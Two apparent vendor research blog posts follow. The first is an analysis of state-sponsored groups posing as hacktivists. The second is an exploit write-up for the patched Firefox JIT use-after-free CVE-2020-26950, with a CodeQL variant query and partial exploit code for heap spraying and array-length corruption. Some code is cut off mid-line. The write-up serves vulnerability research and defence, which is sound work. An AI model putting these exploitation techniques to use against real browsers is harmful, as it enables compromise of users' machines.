Hacktivism and State-Sponsored Knock-Offs | Attributing Deceptive Hack-and-Leak Operations

27 January 2022 at 18:59

There’s a seductive allure to the story that hacking can be a force for good, a way to tip the scales in favor of an underdog equipped with little more than a terminal, elite skills, and good intentions. In previous decades, what passed for hacktivism was little more than pointed website defacements and distributed denial of service attacks. Basically, politically motivated nuisances. They made their presence known, but their long-term impact was negligible. A post-Wikileaks era emphasized the power of hack-and-leak operations as a suitable lever for real-world impact of the sort hacktivists had sought for a long time. And it inevitably became the de facto standard for the greyhat vigilante.

The idea of hacktivists out there looking to settle the score against oppressive regimes is alluring in the same way that a grassroots revolution, a cohesive outcry of an oppressed people against their oppressors, is alluring. But the two aren’t equivalent.

A politically motivated hacking operation is not representative of a societal quorum. Technological skills and means are an amplifier that can give a handful of individuals an outsized voice and while that may be used to advance a moral cause, it’s also a great cover for action for established state-sponsored actors to influence sentiment and outcomes all over the world.

All of which raises the questions: are there still real hacktivists out there, or are they all a cover for state-sponsored operations? Have we learned enough from previous run-ins to improve our analysis processes when approaching these potential deception operations?

Our focus on this topic was motivated by our discovery of MeteorExpress and the rise of the Belarusian Cyber Partisans as a force opposing the Lukashenko regime. The two are vastly different cases of hacktivism, with the former exhibiting inauthentic traits while the latter makes for a more convincing example of a grassroots endeavor.

The results of our analysis were first codified in the form of a CyberWarcon 2021 talk. In light of recent events, like the Partisans’ alleged use of ransomware to hinder Russian troop movements and a recent FBI report revisiting aspects of the Yemen Cyber Army, we felt it appropriate to spell out some insights and open mysteries.

State-Sponsored Knockoffs

In our 2016 paper, Brian Bartholomew and I documented multiple instances of state-sponsored groups abusing hacktivist covers for their operations, focusing on two particular actors, Lazarus and Sofacy (APT28, STRONTIUM, FancyBear, etc.). Let’s briefly recap both.

Sony Pictures Entertainment hack claimed by Lazarus cover ‘Guardians of Peace’

The former resorted to this tactic early and often but did so poorly. Around 2015, it was easier to consider Lazarus a single grand threat cluster unified by a nexus of North Korean interest. Their operations against South Korean targets in 2012-2014 employed the cover of ‘hacktivist’ groups like ‘IsOne’, the ‘New Romantic Cyber Army’, and ‘WhoIs Team’.

Their more infamous cover, ‘Guardians of Peace’, became well-known for its involvement in the Sony Entertainment Pictures hack. Ultimately, all these hacktivist groups proved a thin and unconvincing disguise. They lacked any established pedigree and would lack any further operational continuity. They were abandoned just as quickly as the operations were carried out.

‘Anonymous Poland’ hack-and-leak amplification attempt by tweeting at researchers

On the other hand, Sofacy would prove far more dogged and successful in their use of hacktivism groups as cover. In some cases, they succeeded in fooling media outlets, victims, and researchers into thinking that they were dealing with hacktivist jihadis (CyberCaliphate) or pro-Russian Ukrainian security services (CyberBerkut).

While these outfits lacked much pedigree, they were nurtured over time and focused on objectives across different regions. Their efforts became sloppier during the summer of election hacks in 2016, employing outfits like the now infamous Guccifer 2.0, the lesser known @AnPoland, and even ultimately embracing one of their threat intelligence cryptonyms outright as the ‘FancyBears Hack Team’.

Beyond soft indicators like pedigree and continuity, threat intelligence researchers avidly tracking state-sponsored operations were in a position to correlate the leak phase of these operations with their respective earlier intrusion phases. For example, the attackers put effort into creating a hacktivist cover like @AnPoland to release documents stolen from the World Anti-Doping Agency (WADA) or the Court of Arbitration for Sport (Tas-Cas). Around the same time, Sofacy was seen registering WADA and Tas-Cas typosquatted domains for use in their phishing campaigns.

A possible coincidence? Sure. But we can add ‘overlap with a state-sponsored operation’ as another soft indicator in our assessment matrix for hacktivist covers.

These examples are practically ancient history in InfoSec years. We’re revisiting them precisely because the benefit of hindsight does a lot to dispel the confusion that accompanies fresh enemy incursions. For example, while we suspected that Yemen Cyber Army (YCA) was another Sofacy front due to a combination of soft indicators, Simin Kargar’s 2021 Cyberwarcon talk weighed the possibility of Iranian vs. Russian state-sponsorship behind YCA.

Simin Kargar notes the timeline of YCA activity related to the Iranian company Emennet Pasargad

With the timely release of the FBI’s report on Iranian-based company Emennet Pasargad (a.k.a. Eeleyanet Gostar), the benefit of hindsight may ultimately tip the scale in favor of Kargar’s Iranian hypothesis. The FBI connects Emennet Pasargad with both 2018 YCA activity as well as a 2020 U.S. voter intimidation and disinformation campaign under the cover of Proud Boys.

That said, keep in mind that the Yemen Cyber Army activity referenced occurs in 2018 and is not expressly linked back to the 2015 activity (as noted by Kargar). As she hints in her tweet, there’s always the possibility of yet another turn, a ‘knockoff’ hijacking the pedigree of this hacktivism cover for themselves.

‘Indra’, ‘Predatory Sparrow’, and ‘Adalat Ali’

More recently, we investigated the case of MeteorExpress, a previously unknown actor conducting wiper attacks across Syria and Iran since 2019. This brought back the question of inauthentic hacktivism as MeteorExpress activities were claimed by different short-lived, no pedigree ‘hacktivist’ groups under names like ‘Indra’, ‘Predatory Sparrow’, and possibly ‘Adalat Ali’.

Each appeared to have their own delimited campaigns, Telegram channels, social media accounts, and dropped stolen files via MEGA. The handling of the diverse fronts was inconsistent. Indra and Predatory Sparrow attacks were correlated by the use of slightly altered versions of MeteorExpress malware. Notably, there are even two separate Predatory Sparrow accounts, pointing to a possible hijack or something as embarrassing as a loss of credentials for the first.

We can at least say that inauthentic hacktivism is alive and well as a cover for action for state-sponsored attacks looking for a modicum of plausible deniability.

What Might Real Hacktivism Look Like?

Having discussed so many examples of fake hacktivism, we can distill the soft indicators that have proven most useful for evaluating the authenticity of hacktivism in a modern context.

  • Pedigree
    • Where did they come from? What have they done before?
  • Continuity
    • What happens after the initial attack?
  • Sourcing of Materials
    • How did they arrive at the materials pilfered or leaked?
  • Release Coordination
    • How are their released materials disseminated and amplified?
  • Cui bono
    • Who benefits? Who is negatively affected? Who should be negatively affected but isn’t?
  • Consistency of Objectives
    • Are the attackers consistently working towards their stated cause?
  • Secondary Effects
    • What effects are being courted? Media attention? Government response? Regional tensions?
  • Targeting
    • How are their targets selected? What prior knowledge would someone require to select or reach these targets?
  • Consistency
    • How well defined is the group? What ties one claim of ownership over a campaign to another? Is it a nebulous collective that different actors could hijack?

In the absence of hard technical indicators, these are some of the questions analysts should consider as they evaluate the authenticity of a hacktivism group. At this point, I’ll admit a tendency towards default skepticism, but we’d do well not to discount the possibility of a true homegrown asymmetrical threat.

Play Along at Home

For those analysts eager to try their hand at some of this analysis, there are multiple unsolved mysteries to choose from.

  • Lab Dookhtegan and GreenLeakers, two notorious groups sporadically leaking tools and materials allegedly belonging to Iranian APTs OilRig and MuddyWater, respectively.
    LabDookhtegan and GreenLeakers
  • SpiderZ, a mysterious group responsible for hacking the Al-Qard Al-Hassan financial organization and disclosing mechanisms used by Hezbollah to bypass U.S. sanctions in Lebanon.
    SpiderZ logo from their Anonymous-themed YouTube video
  • AgainstTheWest, a persona brought to my attention by Aaron DeVera during the CyberWarcon Q&A. ATW stages sporadic attacks against the Chinese government. DeVera recently published a profile of ATW.
  • IntrusionTruth is a notorious outfit in the threat intelligence space. They intermittently release blogs profiling the individuals and companies behind different Chinese APTs with a decent level of detail, substantiated via public sourcing or different telemetry services.
    IntrusionTruth logo consistent across their blog and Twitter account
  • ‘John Doe’ is purportedly the sole source behind the Panama Papers, claiming responsibility for the hack against Panamanian company Mossack Fonseca that set off the global tidal wave of revelations on the illicit use of offshore companies to hide wealth. Despite an initial mistaken arrest of a local employee, little is known about this attacker beyond their statement of intent. Further releases by the International Consortium of Investigative Journalists (ICIJ), titled ‘Pandora Papers’, have been more opaque about their sourcing, so what happened to John Doe?
  • Last, but most certainly not least, is the mythical ‘Phineas Fisher’.
    Sock puppet used to represent Phineas Fisher at their request during a Vice CyberWar interview

    While it’s hard to assess the authenticity or provenance of PF, they’re arguably the most successful modern hacktivist outfit, with a confirmed kill under their belt: HackingTeam. PF took their name from their first publicly attributed hack against Gamma Group (the makers of FinFisher) in 2014. They would then go on to breach HackingTeam so epically that they essentially left the company to slowly bleed out and ultimately shut down.

    ASCII art from one of Phineas Fisher’s HackBack Guides

    While PF is better known for these big hacks, they also went on to release multiple hacking guides rife with Anarcho-Marxist references. The stated purpose was to empower others to follow in their footsteps and stand up to capitalist abuses. That mission was further bolstered by hacks against the Mossos D’Esquadra police union of the Catalan Police, the AKP party in Turkey, and the Cayman Island National Bank and Trust. Subsequently, PF set up the ‘Hacktivist Bug Hunting Program’, offering up to $100,000 in cryptocurrency as a reward for hacks against companies contributing to our ‘hypercapitalist dystopia’.

An Authentic Example?

Keen readers might note that I haven’t pointed to any groups as authentic modern hacktivist outfits. Rather than embrace skepticism entirely, I’ll go out on a limb and point to the recent rise of the Belarusian Cyber Partisans as a group with all the hallmarks of authentic hacktivist behavior, fully allowing for the possibility that I’ll end up eating my words. Let’s apply the metrics we’ve previously discussed.

Belarusian Cyber Partisans Logo

The Belarusian Cyber Partisans claim to be a collective of local system administrators fighting against the Lukashenko regime. Most of their attacks have focused on disclosures of stolen government information in the hopes of attracting further scrutiny on the practices of the incumbent leadership. By their own admission in private communications, the Partisans felt that the media were not paying enough attention to these revelations. They’ve now graduated to a new strategy of leveraging ransomware to disable strategically significant institutions, starting with the Belarusian Railways company (BCh) in an attempt to hinder Russian troop movements within Belarus and demanding the release of political prisoners.

Applying our soft indicators, we see the Partisans’ activity establishing a clear pedigree and continuity of operations that is continually emboldened but not suddenly enhanced by outsized capabilities. As reports leak detailing some of the means of their attacks, we see rather mundane technical indicators, largely abusing free services and commonly available tooling, though by their own admission the ransomware allegedly used at BCh is one they wrote themselves (something we haven’t independently confirmed due to a lack of samples).

Union of Belarusian Security Officers

Most importantly, their limitations and tasking appear organic. They claim that in order to discover important government targets, they collaborate with a union of current and former Belarusian security officers (BYPOL) better acquainted with the inner workings of the government. That organic tasking stands in stark contrast to the example of MeteorExpress’ Indra campaign where a no pedigree ‘hacktivism’ group knew the exact companies allegedly supporting Iranian Revolutionary Guard Corps (IRGC) operations in Syria to hack-and-leak. This pinpoint targeting goes unexplained in the MeteorExpress narrative, and in most state-sponsored fly-by-night covers.

Signaling and Secondary Effects

There are reasons that we should foment greater analytic rigor when it comes to the authenticity of hacktivist operations. The use of a hacktivist cover goes hand-in-hand with the intention to release materials publicly and amplify a narrative for a given audience.

That’s a non-trivial change when it comes to state-sponsored operations, most of which are designed to remain undiscovered for as long as possible. Hack-and-leak operations are meant to court (selective or wide) attention and cause an effect. In the process, these groups leverage two audiences: security researchers and journalists.

Predatory Sparrow proactively messaging Western Media on gas pump attack

I’m afraid to say that we both prove susceptible conduits for different but similar reasons. We as security researchers are fascinated by new attacks, by the thrill of a new puzzle to put together. Our jobs often entail sharing information with other companies, reporting to governments, or publishing to as wide an audience as we have at our disposal. Similarly, journalists are always on the lookout for the next big story, they have editors and metrics. And neither group benefits from a wealth of time to scrutinize all aspects of a possible deception operation before amplifying it.

It’s easy to dismiss the ethical implications of our respective roles in these ops, but I think it’s important to sit with the discomfort and weigh (perhaps fruitlessly) how we might serve as more conscious stewards of the information we come across. We are not an incidental part of the dissemination phase of these operations but a vital one, and we’d do well to act as a discerning one.

Concluding Thoughts

Hacktivism has come a long way from the late 90s and early 2000s years of nuisance hacks and naive collectives. If we distill what we’ve learned over the past decade of hacktivism abused as a cover for action, clear insights come into view:

  • State-sponsored groups use the guise of grassroots motivations not just for plausible deniability but also to imbue their leaks with legitimacy not afforded by the obvious intervention of a government.
  • Given the comparative volume of hacktivism ops that have turned out to be state-sponsored deception ops in the past ten years, we may also lean towards the conclusion that most hacktivism is used as a cover.
  • We actually struggle to narrow in on the examples of authentic hacktivism in the past decade, though it surely exists.
  • Our ability to assess these operations with certainty remains weak and is untimely compared to the speed with which their information is disseminated and amplified.

As a partial salve, we should hold steadfast to the attributes and soft indicators that have served us in determining the (in)authenticity of previous groups and apply them to these operations as they arise.

And for those avid practitioners and hungry analysts out there, it’s clear that the hacktivism space contains a wealth of unsolved mysteries to tackle.

Firefox JIT Use-After-Frees | Exploiting CVE-2020-26950

3 February 2022 at 16:30

Executive Summary

  • SentinelLabs worked on examining and exploiting a previously patched vulnerability in the Firefox just-in-time (JIT) engine, enabling a greater understanding of the ways in which this class of vulnerability can be used by an attacker.
  • In the process, we identified unique ways of constructing exploit primitives by using function arguments to show how a creative attacker can utilize parts of their target not seen in previous exploits to obtain code execution.
  • Additionally, we worked on developing a CodeQL query to identify whether there were any similar vulnerabilities that shared this pattern.



At SentinelLabs, we often look into various complicated vulnerabilities and how they’re exploited in order to understand how best to protect customers from different types of threats.

CVE-2020-26950 is one of the more interesting Firefox vulnerabilities to be fixed. Discovered by the 360 ESG Vulnerability Research Institute, it targets the now-replaced JIT engine used in Spidermonkey, called IonMonkey.

Within a month of this vulnerability being found in late 2020, the area of the codebase that contained the vulnerability had become deprecated in favour of the new WarpMonkey engine.

What makes this vulnerability interesting is the number of constraints involved in exploiting it, to the point that I ended up constructing some previously unseen exploit primitives. By knowing how to exploit these types of unique bugs, we can work towards ensuring we detect all the ways in which they can be exploited.

Just-in-Time (JIT) Engines

When people think of web browsers, they generally think of HTML, JavaScript, and CSS. In the days of Internet Explorer 6, it certainly wasn’t uncommon for web pages to hang or crash. JavaScript, being the complicated high-level language that it is, was not particularly well suited to fast applications, and improvements to allocators, lazy generation, and garbage collection simply weren’t enough to make it so. Fast forward to 2008, when Mozilla and Google both released their first JIT engines for JavaScript.

JIT is a way for interpreted languages to be compiled into assembly while the program is running. In the case of JavaScript, this means that a function such as:

function add() {
	return 1+1;
}

can be replaced with assembly such as:

push    rbp
mov     rbp, rsp
mov     eax, 2
pop     rbp

This is important because originally the function would be executed using JavaScript bytecode within the JavaScript Virtual Machine, which compared to assembly language, is significantly slower.

Since JIT compilation is quite a slow process due to the huge number of heuristics that take place (such as constant folding, as shown above when 1+1 was folded to 2), only those functions that would truly benefit from being JIT compiled are compiled. Functions that are run a lot (think 10,000 times or so) are ideal candidates and are going to make page loading significantly faster, even with the tradeoff of JIT compilation time.

Redundancy Elimination

Something that is key to this vulnerability is the concept of eliminating redundant nodes. Take the following code:

function read(i) {
	if (i < 10) {
		return i + 1;
	}
	return i + 2;
}

This would start as the following JIT pseudocode:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Get value of 'i'
6. Add 2 to GetValue5
7. Return Int32 Add6
8. Get value of 'i'
9. Add 1 to GetValue8
10. Return Add9 as an Int32

In this, we see that we get the value of argument i multiple times throughout this code. Since the value is never set in the function and only read, having multiple GetValue nodes is redundant since only one is required. JIT Compilers will identify this and reduce it to the following:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Add 2 to GetValue2
6. Return Int32 Add5
7. Add 1 to GetValue2
8. Return Add7 as an Int32

CVE-2020-26950 exploits a flaw in this kind of assumption.

IonMonkey 101

How IonMonkey works is a topic that has been covered in detail several times before. In the interest of keeping this section brief, I will give a quick overview of the IonMonkey internals. If you have a greater interest in diving deeper into the internals, the linked articles above are a must-read.

JavaScript doesn’t immediately get translated into assembly language. There are a bunch of steps that take place first. Between bytecode and assembly, code is translated into several other representations. One of these is called Middle-Level Intermediate Representation (MIR). This representation is used in Control-Flow Graphs (CFGs) that make it easier to perform compiler optimisations on.

Some examples of MIR nodes are:

  • MGuardShape - Checks that the object has a particular shape (The structure that defines the property names an object has, as well as their offset in the property array, known as the slots array) and falls back to the interpreter if not. This is important since JIT code is intended to be fast and so needs to assume the structure of an object in memory and access specific offsets to reach particular properties.
  • MCallGetProperty - Fetches a given property from an object.

Each of these nodes has an associated Alias Set that describes whether they Load or Store data, and what type of data they handle. This helps MIR nodes define what other nodes they depend on and also which nodes are redundant. For example, a node that reads a property will depend on either the first node in the graph or the most recent node that writes to the property.

In the context of the GetValue pseudocode above, these would have a Load Alias Set since they are loading rather than storing values. Since there are no Store nodes between them that affect the variable they’re loading from, they would have the same dependency. Since they are the same node and have the same dependency, they can be eliminated.

If, however, the variable were to be written to before the second GetValue node, then it would depend on this Store instead and will not be removed due to depending on a different node. In this case, the GetValue node is Aliasing with the node that writes to the variable.
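As a standalone illustration of that aliasing rule (my own sketch, not engine code), a store sitting between two property reads forces the second read to be kept:

```javascript
// Hypothetical illustration: the store to o.x aliases with the second read,
// so the two loads of o.x cannot be merged during redundancy elimination.
function readWriteRead(o) {
    let a = o.x;   // first load of o.x
    o.x = a + 1;   // store: the next load now depends on this node
    let b = o.x;   // second load: not redundant, must be kept
    return a + b;
}
console.log(readWriteRead({ x: 1 })); // 3
```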

The Vulnerability

With open-source software such as Firefox, understanding a vulnerability often starts with the patch. The Mozilla Security Advisory states:

CVE-2020-26950: Write side effects in MCallGetProperty opcode not accounted for
In certain circumstances, the MCallGetProperty opcode can be emitted with unmet assumptions resulting in an exploitable use-after-free condition.

The critical part of the patch is in IonBuilder::createThisScripted as follows:

IonBuilder::createThisScripted patch

To summarise, the code would originally try to fetch the object prototype from the Inline Cache using the MGetPropertyCache node (Lines 5170 to 5175). If doing so causes a bailout, it will next switch to getting the prototype by generating a MCallGetProperty node instead (Lines 5177 to 5180).

After this fix, the MCallGetProperty node is no longer generated upon bailout. This alone would likely cause a bailout loop, whereby the MGetPropertyCache node is used, a bailout occurs, then the JIT gets regenerated with the exact same nodes, which then causes the same bailout to happen (See: Definition of insanity).

The patch, however, has added some code to IonGetPropertyIC::update that prevents this loop from happening by disabling IonMonkey entirely for this script if the MGetPropertyCache node fails for JSFunction object types:

IonBuilder code to prevent a bailout-loop

So the question is, what’s so bad about the MCallGetProperty node?

Looking at the code, it’s clear that when the node is idempotent, as set on line 5179, the Alias Set is a Load type, which means that it will never store anything:

Alias Set when idempotent is true

This isn’t entirely correct. In the patch, the line of code that disables Ion for the script is only run for JSFunction objects when fetching the prototype property, which is exactly what IonBuilder::createThisScripted is doing, but for all objects.

From this, we can conclude that this is an edge case where JSFunction objects have a write side effect that is triggered by the MCallGetProperty node.

Lazy Properties

One of the ways that JavaScript engines improve their performance is to not generate things if not absolutely necessary. For example, if a function is created and is never run, parsing it to bytecode would be a waste of resources that could be spent elsewhere. This last-minute creation is a concept called laziness, and JSFunction objects perform lazy property resolution for their prototypes.
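From script, this laziness is invisible because the resolve hook fires on first access; what is observable is only the result of resolution. A small sketch:

```javascript
function demo() {}
// The first access to .prototype runs the JSFunction resolve hook
// (fun_resolve -> ResolveInterpretedFunctionPrototype), which defines
// the property on the object via DefineDataProperty.
const proto = demo.prototype;
// The generated prototype object links back to the function itself.
console.log(proto.constructor === demo); // true
```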

When the MCallGetProperty node is converted to an LCallGetProperty node and is then turned to assembly using the Code Generator, the resulting code makes a call back to the engine function GetValueProperty. After a series of other function calls, it reaches the function LookupOwnPropertyInline. If the property name is not found in the object shape, then the object class’ resolve hook is called.

Calling the resolve hook

The resolve hook is a function specified by object classes to generate lazy properties. It’s one of several class operations that can be specified:

The JSClassOps struct

In the case of the JSFunction object type, the function fun_resolve is used as the resolve hook.

The property name ID is checked against the prototype property name. If it matches and the JSFunction object still needs a prototype property to be generated, then it executes the ResolveInterpretedFunctionPrototype function:

The ResolveInterpretedFunctionPrototype function

This function then calls DefineDataProperty to define the prototype property, add the prototype name to the object shape, and write it to the object slots array. Therefore, although the node is supposed to only Load a value, it has ended up acting as a Store.

The issue becomes clear when considering two objects allocated next to each other:

If the first object were to have a new property added, there’s no space left in the slots array, which would cause it to be reallocated, as so:

In terms of JIT nodes, if we were to get two properties called x and y from an object called o, it would generate the following nodes:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. GuardShape of object 'o'
5. Slots of object 'o'
6. LoadDynamicSlot 'y' from slots5

Thinking back to the redundancy elimination, if properties x and y are both non-getter properties, there’s no way to change the shape of the object o, so we only need to guard the shape once and get the slots array location once, reducing it to this:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. LoadDynamicSlot 'y' from slots2

Now, if object o is a JSFunction and we can trigger the vulnerability above between the two, the location of the slots array has now changed, but the second LoadDynamicSlot node will still be using the old location, resulting in a use-after-free:


The final piece of the puzzle is how the function IonBuilder::createThisScripted is called. It turns out that up a chain of calls, it originates from the jsop_call function. Despite the name, it isn’t just called when generating the MIR node for JSOp::Call, but also several other nodes:

The vulnerable code path will also only be taken if the second argument (constructing) is true. This means that the only opcodes that can reach the vulnerability are JSOp::New and JSOp::SuperCall.
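In script terms, those two opcodes correspond to ordinary `new` expressions and `super()` calls inside derived-class constructors; a minimal sketch of each:

```javascript
// JSOp::New - an ordinary constructor call
function Ctor() { this.v = 1; }
const a = new Ctor();

// JSOp::SuperCall - super() inside a derived class constructor
class Base { constructor() { this.w = 2; } }
class Derived extends Base { constructor() { super(); } }
const b = new Derived();

console.log(a.v, b.w); // 1 2
```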

Variant Analysis

In order to look at any possible variations of this vulnerability, Firefox was compiled using CodeQL and a query was written for the bug.

import cpp

// Find all C++ VM functions that can be called from JIT code
class VMFunction extends Function {
   VMFunction() {
       this.getAnAccess().getEnclosingVariable().getName() = "vmFunctionTargets"
   }
}

// Get a string representation of the function path to a given function (resolveConstructor/DefineDataProperty)
// depth - to avoid going too far with recursion
string tracePropDef(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | fc.getEnclosingFunction() = f and ((fc.getTarget().getName() = "DefineDataProperty" and result = f.getName().toString()) or (not fc.getTarget().getName() = "DefineDataProperty" and result = tracePropDef(depth + 1, fc.getTarget()) + " -> " + f.getName().toString())))
}

// Trace a function call to one that starts with 'visit' (CodeGenerator uses visit, so we can match against MIR with M)
// depth - to avoid going too far with recursion
Function traceVisit(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | (f.getName().matches("visit%") and result = f) or (fc.getTarget() = f and result = traceVisit(depth + 1, fc.getEnclosingFunction())))
}

// Find the AliasSet of a given MIR node by tracing from inheritance.
Function alias(Class c) {
   (result = c.getAMemberFunction() and result.getName().matches("%getAlias%")) or (result = alias(c.getABaseClass()))
}

// Matches AliasSet::Store(), AliasSet::Load(), AliasSet::None(), and AliasSet::All()
class AliasSetFunc extends Function {
   AliasSetFunc() {
       (this.getName() = "Store" or this.getName() = "Load" or this.getName() = "None" or this.getName() = "All") and this.getType().getName() = "AliasSet"
   }
}
from VMFunction f, FunctionCall fc, Function basef, Class c, Function aliassetf, AliasSetFunc asf, string path
where fc.getTarget().getName().matches("%allVM%") and f = fc.getATemplateArgument().(FunctionAccess).getTarget() // Find calls to the VM from JIT
and path = tracePropDef(0, f) // Where the VM function has a path to resolveConstructor (Getting the path as a string)
and basef = traceVisit(0, fc.getEnclosingFunction()) // Find what LIR node this VM function was created from
and c.getName().charAt(0) = "M" // A quick hack to check if the function is a MIR node class
and aliassetf = alias(c) // Get the getAliasSet function for this class
and asf.getACallToThisFunction().getEnclosingFunction() = aliassetf // Get the AliasSet returned in this function.
and basef.getName().substring(5, c.getName().suffix(1).length() + 5) = c.getName().suffix(1) // Get the actual node name (without the L or M prefix) to match against the visit* function
and (asf.toString() = "Load" or asf.toString() = "None") // We're only interested in Load and None alias sets.
select c, f, asf, basef, path

This produced a number of results, most of which were for properties defined for new objects such as errors. It did, however, reveal something interesting in the MCreateThis node. It appears that the node has AliasSet::Load(AliasSet::Any), despite the fact that when a constructor is called, it may generate a prototype with lazy evaluation, as described above.

However, this bug is actually unexploitable since this node is followed by either an MCall node, an MConstructArray node, or an MApplyArgs node. All three of these nodes have AliasSet::Store(AliasSet::Any), so any MSlots nodes that follow the constructor call will not be eliminated, meaning that there is no way to trigger a use-after-free.

Triggering the Vulnerability

The proof-of-concept reported to Mozilla was reduced by Jan de Mooij to a basic form. In order to make it readable, I’ve added comments to explain what each important line is doing:

function init() {
   // Create an object to be read for the UAF
   var target = {};
   for (var i = 0; i 

Exploiting CVE-2020-26950

Use-after-frees in Spidermonkey don’t get written about a lot, especially when it comes to those caused by JIT.

As with any heap-related exploit, the heap allocator needs to be understood. In Firefox, you’ll encounter two heap types:

  • Nursery - Where most objects are initially allocated.
  • Tenured - Objects that are alive when garbage collection occurs are moved from the nursery to here.

The nursery heap is relatively straightforward. The allocator has a chunk of contiguous memory that it uses for user allocation requests, an offset pointing to the next free spot in this region, and a capacity value, among other things.
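A toy model of that design (just the shape described above, not Spidermonkey code):

```javascript
// Toy nursery: a contiguous region, a bump offset, and a capacity.
class ToyNursery {
    constructor(capacity) {
        this.offset = 0;        // next free spot in the region
        this.capacity = capacity;
    }
    alloc(size) {
        if (this.offset + size > this.capacity) return null; // would trigger GC
        const addr = this.offset;
        this.offset += size;    // bump the offset
        return addr;
    }
}
const nursery = new ToyNursery(64);
console.log(nursery.alloc(16), nursery.alloc(16)); // 0 16
```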

Exploiting a use-after-free in the nursery would require the garbage collector to be triggered in order to reallocate objects over this location as there is no reallocation capability when an object is moved.

Due to the simplicity of the nursery, a use-after-free in this heap type is trickier to exploit from JIT code. Because JIT-related bugs often have a whole number of assumptions you need to maintain while exploiting them, you’re limited in what you can do without breaking them. For example, with this bug you need to ensure that any instructions you use between the Slots pointer getting saved and it being used when freed are not aliasing with the use. If they were, then that would mean that a second MSlots node would be required, preventing the use-after-free from occurring. Triggering the garbage collector puts us at risk of triggering a bailout, destroying our heap layout, and thus ruining the stability of the exploit.

The tenured heap plays by different rules to the nursery heap. It uses mozjemalloc (a fork of jemalloc) as a backend, which gives us opportunities for exploitation without touching the GC.

As previously mentioned, the tenured heap is used for long-living objects; however, there are several other conditions that can cause allocation here instead of the nursery, such as:

  • Global objects - Their elements and slots will be allocated in the tenured heap because global objects are often long-living.
  • Large objects - The nursery has a maximum size for objects, defined by the constant MaxNurseryBufferSize, which is 1024.

By creating an object with enough properties, the slots array will instead be allocated in the tenured heap. If the slots array has fewer than 256 properties in it, then jemalloc will allocate this as a “Small” allocation. If it has 256 or more properties in it, then jemalloc will allocate this as a “Large” allocation. In order to further understand these two and their differences, it’s best to refer to these two sources, which extensively cover the jemalloc allocator. For this exploit, we will be using Large allocations to perform our use-after-free.
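For example, an object can be pushed into a “Large” allocation simply by giving it enough named properties (the 256-property threshold is the one stated above; the helper below is my own illustration):

```javascript
// Build an object with n named properties so its slots array is large
// enough to become a jemalloc "Large" allocation (256+ properties, per above).
function makeSprayObject(n) {
    const o = {};
    for (let i = 0; i < n; i++) {
        o['p' + i] = i;
    }
    return o;
}
const sprayed = makeSprayObject(300); // >= 256 properties -> "Large" slots allocation
console.log(Object.keys(sprayed).length); // 300
```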


In order to write a use-after-free exploit, you need to allocate something useful in the place of the previously freed location. For JIT code this can be difficult because many instructions would stop the second MSlots node from being removed. However, it’s possible to create arrays between these MSlots nodes and the property access.

Array element backing stores are a great candidate for reallocation because of their header. While properties start at offset 0 in their allocated Slots array, elements start at offset 0x10:

A comparison between the elements backing store and the slots backing store

If a use-after-free were to occur, and an elements backing store was reallocated on top, the length values could be updated using the first and second properties of the Slots backing store.

To get to this point requires a heap spray similar to the one used in the trigger example above:

/*
   jitme - Triggers the vulnerability
*/
function jitme(cons, interesting, i) {
   interesting.x1 = 10; // Make sure the MSlots is saved
   new cons(); // Trigger the vulnerability - Reallocates the object slots
   // Allocate a large array on top of this previous slots location.
   let target = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 489 to be close to the number of properties ‘cons’ has
   // Avoid Elements Copy-On-Write by pushing a value
   // Write the Initialized Length, Capacity, and Length to be larger than it is
   // This will work when interesting == cons
   interesting.x1 = 3.476677904727e-310;
   interesting.x0 = 3.4766779039175e-310;
   // Return the corrupted array
   return target;
}

/*
   init - Initialises vulnerable objects
*/
function init() {
   // arr will contain our sprayed objects
   var arr = [];
   // We'll create one object...
   var cons = function() {};
   for(i=0; i

Which gets us to this layout:

Before and after the use-after-free is exploited

At this point, we have an Array object with a corrupted elements backing store. It can only read/write NaN-boxed values to out-of-bounds locations (in this case, the next Slots store).

Going from this layout to some useful primitives such as ‘arbitrary read’, ‘arbitrary write’, and ‘address of’ requires some forethought.

Primitive Design

Typically, the route exploit developers go when creating primitives in browser exploitation is to use ArrayBuffers. This is because the values in their backing stores aren’t NaN-boxed like property and element values are, meaning that if an ArrayBuffer and an Array both had the same backing store location, the ArrayBuffer could make fake NaN-boxed pointers, and the Array could use them as real pointers using its own elements. Likewise, the Array could store an object as its first element, and the ArrayBuffer could read it directly as a Float64 value.

This works well with out-of-bounds writes in the nursery because the ArrayBuffer object will be allocated next to other objects. Being in the tenured heap means that the ArrayBuffer object itself will be inaccessible as it is in the nursery. While the ArrayBuffer backing store can be stored in the tenured heap, Mozilla is already very aware of how it is used in exploits and has thus created a separate arena for them:

Instead of thinking of how I could get around this, I opted to read through the Spidermonkey code to see if I could come up with a new primitive that would work for the tenured heap. While there were a number of options related to WASM, function arguments ended up being the nicest way to implement it.

Function Arguments

When you call a function, a new object gets created called arguments. This allows you to access not just the arguments defined by the function parameters, but also those that aren’t:

function arg() {
   return arguments[0] + arguments[1];
}


Spidermonkey represents this object in memory as an ArgumentsObject. This object has a reserved property that points to an ArgumentsData backing store (of course, stored in the tenured heap when large enough), where it holds an array of values supplied as arguments.

One of the interesting properties of the arguments object is that you can delete individual arguments. The caveat to this is that you can only delete it from the arguments object, but an actual named parameter will still be accessible:

function arg(x) {
   console.log(x); // 1
   console.log(arguments[0]); // 1

   delete arguments[0]; // Delete the first argument (x)

   console.log(x); // 1
   console.log(arguments[0]); // undefined
}


To avoid needing separate storage for the arguments object and the named arguments, Spidermonkey implements a RareArgumentsData structure (named as such because it’s rare that anybody would even delete anything from the arguments object). This is a plain (non-NaN-boxed) pointer to a memory location that contains a bitmap. Each bit represents an index in the arguments object. If the bit is set, then the element is considered “deleted” from the arguments object. This means that the actual value doesn’t need to be removed, and arguments and parameters can share the same space without problems.

The benefit of this is threefold:

  • The RareArgumentsData pointer can be moved anywhere and used to read the value of an address bit-by-bit.
